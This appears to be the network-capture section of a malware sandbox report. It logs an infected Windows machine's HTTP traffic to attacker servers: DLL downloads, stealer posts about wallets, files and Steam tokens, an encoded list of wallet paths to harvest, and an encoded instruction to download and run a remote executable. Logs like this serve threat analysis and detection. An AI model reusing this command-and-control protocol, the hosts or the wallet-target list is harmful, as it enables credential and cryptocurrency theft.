                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:12.744714022 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.195797920 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:12 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                            ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.953166008 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:14.404201984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:14 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                            ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.208122969 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJ
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 1067
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.163568020 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:15 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.303528070 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAK
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 46 48 49 49 4a 4a 45 43 47 44 48 49 45 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 46 48 49 49 4a 4a 45 43 47 44 48 49 45 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 46 48 49 49 4a 4a 45 43 47 44 48 49 45 47 44 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------ECAFHIIJJECGDHIEGDAKContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------ECAFHIIJJECGDHIEGDAKContent-Disposition: form-data; name="message"wallets------ECAFHIIJJECGDHIEGDAK--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.757469893 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:16 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Content-Length: 2408
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.960836887 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAK
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 265
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="message"files------GDAAKKEHDHCAAAKFCBAK--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.413568974 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:17 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.432661057 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHD
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:18.393012047 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:17 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:18.427123070 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFH
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 272
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------HIEHDHCFIJDBFHJJDBFHContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------HIEHDHCFIJDBFHJJDBFHContent-Disposition: form-data; name="message"ybncbhylepme------HIEHDHCFIJDBFHJJDBFH--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:18.880995035 CET271INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:18 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 68
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=86
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            16192.168.2.449920185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:57.336317062 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 30 37 39 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                                            Data Ascii: d1=1007917001&unit=246122658369
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:58.718463898 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:58 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            17192.168.2.449935185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.466958046 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:01.843750000 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:01 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            18192.168.2.44993634.107.221.82803176C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.608658075 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            Connection: keep-alive


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            19192.168.2.449946185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:03.890639067 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:05.202316999 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:04 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            20192.168.2.449955185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:06.943178892 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:08.284511089 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:08 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


